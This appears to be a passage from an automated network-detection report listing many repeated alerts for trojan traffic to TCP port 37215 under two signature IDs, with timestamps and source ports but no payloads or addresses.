                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.228514
                  SID:2829579
                  Source Port:40486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.243184
                  SID:2829579
                  Source Port:55446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.003897
                  SID:2829579
                  Source Port:58946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.253247
                  SID:2829579
                  Source Port:32770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.147073
                  SID:2829579
                  Source Port:34962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.611390
                  SID:2835222
                  Source Port:33176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.906291
                  SID:2829579
                  Source Port:55424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.513425
                  SID:2835222
                  Source Port:50380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609606
                  SID:2835222
                  Source Port:37210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.800580
                  SID:2829579
                  Source Port:53796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.488855
                  SID:2829579
                  Source Port:36496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.814735
                  SID:2835222
                  Source Port:33068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.646162
                  SID:2829579
                  Source Port:32876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.595599
                  SID:2835222
                  Source Port:34648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.837904
                  SID:2829579
                  Source Port:54480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.647215
                  SID:2829579
                  Source Port:53396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.881196
                  SID:2829579
                  Source Port:37672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.981479
                  SID:2835222
                  Source Port:37828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.878204
                  SID:2829579
                  Source Port:49794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819021
                  SID:2835222
                  Source Port:58622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.154416
                  SID:2829579
                  Source Port:41924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.835620
                  SID:2835222
                  Source Port:40092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.858032
                  SID:2829579
                  Source Port:34002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.508091
                  SID:2829579
                  Source Port:53732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.658230
                  SID:2835222
                  Source Port:40568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.367080
                  SID:2835222
                  Source Port:55878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.112460
                  SID:2835222
                  Source Port:56982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.822212
                  SID:2835222
                  Source Port:36238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.401175
                  SID:2829579
                  Source Port:33042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.792778
                  SID:2829579
                  Source Port:47388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.366871
                  SID:2835222
                  Source Port:36216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.652342
                  SID:2829579
                  Source Port:39084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.976551
                  SID:2835222
                  Source Port:33934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.217201
                  SID:2829579
                  Source Port:36788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.281648
                  SID:2829579
                  Source Port:44332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.648004
                  SID:2835222
                  Source Port:36030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.998541
                  SID:2829579
                  Source Port:41040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.837168
                  SID:2835222
                  Source Port:33318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.086994
                  SID:2835222
                  Source Port:41416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.371486
                  SID:2829579
                  Source Port:42854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.480250
                  SID:2829579
                  Source Port:49786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.511360
                  SID:2829579
                  Source Port:47924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.635714
                  SID:2835222
                  Source Port:35388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.243765
                  SID:2835222
                  Source Port:49714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.456990
                  SID:2835222
                  Source Port:41566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.264063
                  SID:2835222
                  Source Port:38994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.604803
                  SID:2829579
                  Source Port:33964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.857818
                  SID:2829579
                  Source Port:38488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.504435
                  SID:2829579
                  Source Port:35486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.557803
                  SID:2835222
                  Source Port:50716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.055753
                  SID:2835222
                  Source Port:49888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.636058
                  SID:2829579
                  Source Port:45622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.664529
                  SID:2835222
                  Source Port:35500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.333954
                  SID:2835222
                  Source Port:34000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.591282
                  SID:2835222
                  Source Port:33944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.430084
                  SID:2835222
                  Source Port:49110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.623017
                  SID:2829579
                  Source Port:52968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.342964
                  SID:2829579
                  Source Port:52690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.043964
                  SID:2829579
                  Source Port:33132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.872496
                  SID:2835222
                  Source Port:47260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.022886
                  SID:2835222
                  Source Port:55138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.949781
                  SID:2835222
                  Source Port:52320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.426125
                  SID:2829579
                  Source Port:35696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.894673
                  SID:2829579
                  Source Port:35702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.966611
                  SID:2835222
                  Source Port:37482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361334
                  SID:2835222
                  Source Port:38812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.482835
                  SID:2829579
                  Source Port:53938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.757846
                  SID:2829579
                  Source Port:60432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.946860
                  SID:2829579
                  Source Port:60180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.973099
                  SID:2829579
                  Source Port:44222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.454696
                  SID:2835222
                  Source Port:58526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.739922
                  SID:2835222
                  Source Port:60036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.926461
                  SID:2835222
                  Source Port:38100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.784403
                  SID:2829579
                  Source Port:45848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571545
                  SID:2835222
                  Source Port:48922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.500020
                  SID:2835222
                  Source Port:35738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.468391
                  SID:2835222
                  Source Port:43604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.245837
                  SID:2835222
                  Source Port:54650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.991473
                  SID:2829579
                  Source Port:58434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.761974
                  SID:2829579
                  Source Port:43234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.109187
                  SID:2835222
                  Source Port:51116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.513537
                  SID:2829579
                  Source Port:49580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.978865
                  SID:2829579
                  Source Port:50584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.140498
                  SID:2835222
                  Source Port:58144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.883458
                  SID:2829579
                  Source Port:50978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.989941
                  SID:2829579
                  Source Port:37838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.603168
                  SID:2835222
                  Source Port:56100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.602329
                  SID:2829579
                  Source Port:47254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.827119
                  SID:2829579
                  Source Port:59908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.562470
                  SID:2835222
                  Source Port:45074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.573004
                  SID:2829579
                  Source Port:38548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.811678
                  SID:2829579
                  Source Port:53190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.217527
                  SID:2829579
                  Source Port:34944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.652301
                  SID:2835222
                  Source Port:55152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.776063
                  SID:2829579
                  Source Port:54860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.161676
                  SID:2829579
                  Source Port:57530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.754191
                  SID:2835222
                  Source Port:33036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.850341
                  SID:2835222
                  Source Port:50760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.924577
                  SID:2829579
                  Source Port:58170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.089956
                  SID:2829579
                  Source Port:54264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.835564
                  SID:2829579
                  Source Port:36064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.309785
                  SID:2829579
                  Source Port:48236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.921577
                  SID:2835222
                  Source Port:59280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.257724
                  SID:2835222
                  Source Port:38164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.617350
                  SID:2835222
                  Source Port:42840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.789175
                  SID:2829579
                  Source Port:44410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.393770
                  SID:2829579
                  Source Port:44214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.428547
                  SID:2829579
                  Source Port:59180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.810948
                  SID:2835222
                  Source Port:39744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.046264
                  SID:2829579
                  Source Port:35748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.177973
                  SID:2829579
                  Source Port:43390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.650013
                  SID:2835222
                  Source Port:49606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.108861
                  SID:2835222
                  Source Port:43480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389316
                  SID:2835222
                  Source Port:43466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.107652
                  SID:2835222
                  Source Port:42036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.930500
                  SID:2835222
                  Source Port:57818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.421607
                  SID:2829579
                  Source Port:51056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.641730
                  SID:2835222
                  Source Port:58248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.189850
                  SID:2835222
                  Source Port:45434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.584651
                  SID:2835222
                  Source Port:39818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.952619
                  SID:2835222
                  Source Port:51506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.279073
                  SID:2829579
                  Source Port:52296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.904429
                  SID:2829579
                  Source Port:53388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.424443
                  SID:2829579
                  Source Port:46468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.795103
                  SID:2829579
                  Source Port:54488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.391627
                  SID:2835222
                  Source Port:41522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.833295
                  SID:2835222
                  Source Port:37314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.208833
                  SID:2835222
                  Source Port:59072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.570720
                  SID:2835222
                  Source Port:54742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.545396
                  SID:2829579
                  Source Port:55254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.302131
                  SID:2829579
                  Source Port:38882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.417901
                  SID:2835222
                  Source Port:40212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.555900
                  SID:2835222
                  Source Port:45704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.282896
                  SID:2835222
                  Source Port:42134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.628509
                  SID:2835222
                  Source Port:42390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.454697
                  SID:2829579
                  Source Port:43086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.431726
                  SID:2829579
                  Source Port:49952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.474823
                  SID:2835222
                  Source Port:45440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.210665
                  SID:2835222
                  Source Port:59066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.429606
                  SID:2829579
                  Source Port:57290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.761974
                  SID:2829579
                  Source Port:49652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.996817
                  SID:2829579
                  Source Port:44566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.798309
                  SID:2829579
                  Source Port:60820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.367822
                  SID:2835222
                  Source Port:41880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.049112
                  SID:2829579
                  Source Port:60680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.863790
                  SID:2835222
                  Source Port:44036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.761940
                  SID:2835222
                  Source Port:57410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.143490
                  SID:2829579
                  Source Port:37144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.905585
                  SID:2829579
                  Source Port:58220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.323441
                  SID:2829579
                  Source Port:60150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.072676
                  SID:2829579
                  Source Port:49152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.880072
                  SID:2829579
                  Source Port:36450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.929800
                  SID:2835222
                  Source Port:60818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.100122
                  SID:2835222
                  Source Port:47274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.657783
                  SID:2835222
                  Source Port:57774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.809769
                  SID:2829579
                  Source Port:37908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.069487
                  SID:2829579
                  Source Port:52642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.403967
                  SID:2829579
                  Source Port:54262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.447518
                  SID:2829579
                  Source Port:48138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.477490
                  SID:2829579
                  Source Port:34996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.649894
                  SID:2835222
                  Source Port:38544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.785283
                  SID:2829579
                  Source Port:53834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.017469
                  SID:2835222
                  Source Port:45124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.114349
                  SID:2835222
                  Source Port:46184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.827119
                  SID:2829579
                  Source Port:48702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.161907
                  SID:2835222
                  Source Port:35890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.604198
                  SID:2835222
                  Source Port:52394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.171112
                  SID:2829579
                  Source Port:46368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.803145
                  SID:2829579
                  Source Port:43606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.405672
                  SID:2829579
                  Source Port:46012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.458086
                  SID:2835222
                  Source Port:50416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.615907
                  SID:2835222
                  Source Port:48306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.506758
                  SID:2829579
                  Source Port:51320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.524637
                  SID:2835222
                  Source Port:41788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.818099
                  SID:2835222
                  Source Port:45670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.397660
                  SID:2829579
                  Source Port:46648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.173873
                  SID:2829579
                  Source Port:59808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.571728
                  SID:2829579
                  Source Port:53466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.580617
                  SID:2829579
                  Source Port:41326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.937320
                  SID:2835222
                  Source Port:37600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571797
                  SID:2835222
                  Source Port:39496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.833755
                  SID:2835222
                  Source Port:46264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.631590
                  SID:2835222
                  Source Port:52072
                  Destination Port:37215
